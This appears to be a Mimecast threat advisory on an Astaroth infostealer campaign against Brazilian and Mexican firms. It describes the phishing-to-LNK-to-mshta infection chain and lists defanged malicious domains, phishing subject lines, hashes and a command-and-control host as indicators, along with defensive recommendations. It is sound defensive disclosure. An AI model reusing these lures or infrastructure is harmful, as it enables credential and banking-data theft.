Mimecast Logo
Angebot einholen

    Astaroth Infostealer Campaign

    16 June 2025

    By Samantha Clarke

    Key Points

    What you'll learn in this notification

    • Information stealer Trojan that predominantly targets Brazil and Mexico with a financial motive.
    • Employs country-specific social engineering tactics.
    • Leverages newly registered, low-reputation domains that impersonate legitimate services.

    Samantha Clarke and the Mimecast threat researchers have recently identified an Astaroth info stealer campaign. Astaroth represents a mature information stealer Trojan that has maintained active operations in the threat landscape since 2017, with development activities traced back to 2015. The malware specifically targets Latin American countries, concentrating its efforts on Brazil and Mexico where it achieves the highest infection rates.

    Astaroth employs a sophisticated, multi-stage infection process that begins with a phishing email containing an evasive URL hosted on secureserver.net. Upon clicking the link, a zip archive is downloaded containing a malicious shortcut (.lnk) file that uses cmd.exe and mshta.exe to execute obfuscated JavaScript, which then connects to a command and control (C2) server to exfiltrate sensitive system data. The malware is particularly notable for its fileless attack techniques, ability to abuse legitimate OS tools, and sophisticated evasion methods that help it bypass traditional security detection.

    The threat demonstrates sophisticated operational planning through its modular architecture, which enables comprehensive data exfiltration capabilities including banking credentials, session cookies, and stored site login information. Multiple security vendors have documented Astaroth’s technical evolution, with Cybereason's analysis of campaigns targeting Brazil and Mexico through secure server infrastructure. Astaroth campaigns operate with remarkable consistency, maintaining daily activity schedules that exclude weekends and achieving significant scale through email distribution volumes ranging from 10,000 to 100,000 messages per day. Microsoft's security research documented early iterations of these invisible attack techniques, noting the campaign's sustained operational tempo and infrastructure evolution.

    Astaroth’s operational success stems from its implementation of geofencing, which ensures payload delivery occurs only within intended target regions, maximizing infection rates while minimizing exposure to security researchers operating outside these geographies. This targeting approach demonstrates sophisticated understanding of regional security landscapes and user behavior patterns.

    Campaign Themes

    The threat actors deploy region-specific social engineering tactics that align with local cultural and business practices. Mexican campaigns often utilize financial transaction themes, incorporating invoice-related content and transactional notifications that resonate with business users. Brazilian campaigns leverage judicial request themes and government notice impersonation, exploiting local administrative processes and official communication channels.

    Some examples lures captured from the campaign:

    Astaroth Infostealer 1.png

    Astaroth Infostealer 2.png

    Astaroth Infostealer 3.png

    Astaroth Infostealer 4.png

    Technical Infrastructure

    Campaigns utilize newly registered sending domains with deliberately low reputation profiles impersonating legitimate business services.

    The threat consistently utilizes secure server URLs for both initial payload delivery and ongoing command and control communications. Infrastructure hosting frequently relies on GoDaddy-registered domains, providing reliable hosting services with legitimate appearance.

    Mimecast Protection

    We have identified several attributes in the recent campaigns that have been added to our detection capabilities. We continue to monitor for changes in techniques used by this threat operation.

    Targets:

    Mexican and Brazilian organizations in the retail, wholesale, manufacturing verticals.

    Indicators of Compromise (IOCs)

    Sending Domains

    brpassarobemtevi[.]sbs
    brpassarobicodelacre[.]sbs
    brpassarocacatua[.]sbs
    brpassarocalcario[.]sbs
    brpassarocigana[.]sbs
    brpassarocurio[.]sbs
    brpassarodaeuropa[.]sbs
    brpassarodobrasil[.]sbs
    brpassarogalinhadagua[.]sbs
    brpassaroguariba[.]sbs
    brpassarojoaobobo[.]sbs
    brpassarosabiadocampo[.]sbs
    brpassarosaracua[.]sbs
    brpassarosofre[.]sbs
    brpassaroticotico[.]sbs

    Email Subjects

    Notificação importante sobre reclamação de cliente
    Confira os detalhes da nova reclamação registrada
    Reclamação recebida: acesse os detalhes imediatamente
    Detalhes da reclamação: veja e resolva o mais rápido possível

    Secure Server URL

    198.55.167.72.host.secureserver[.]net

    File Hash

    Zip file: 8f2b0918ccd5d95a42dd1fee72f501d7a898815be6929fc68599e16288a90d4f

    LNK file: 1cc7118960b93a91454bbc4498d379e382feeacbdc4a67df7189213c834061ca

    Command-and-control Infrastructure

    plokinnal[.]ameyttistta[.]help

    Recommendations

    • Network Controls
      • Ensure monitoring is in place to identify anomalous access patterns to newly registered GoDaddy domains.
    • Email Security
      • Deploy detection rules for LNK file attachments
    • User security awareness training
      • Educate users on the latest lures used in these campaigns
      • Conduct regular phishing simulations to include the latest threats
      • Train users to never open attachments from unknown or unverified senders
    • Proactive threat hunting
      • Search email receipt logs using specific filters for the subject lines
      • Search& email receipt logs using specific filters for emails originating from the identified sending domains
    Zurück zum Anfang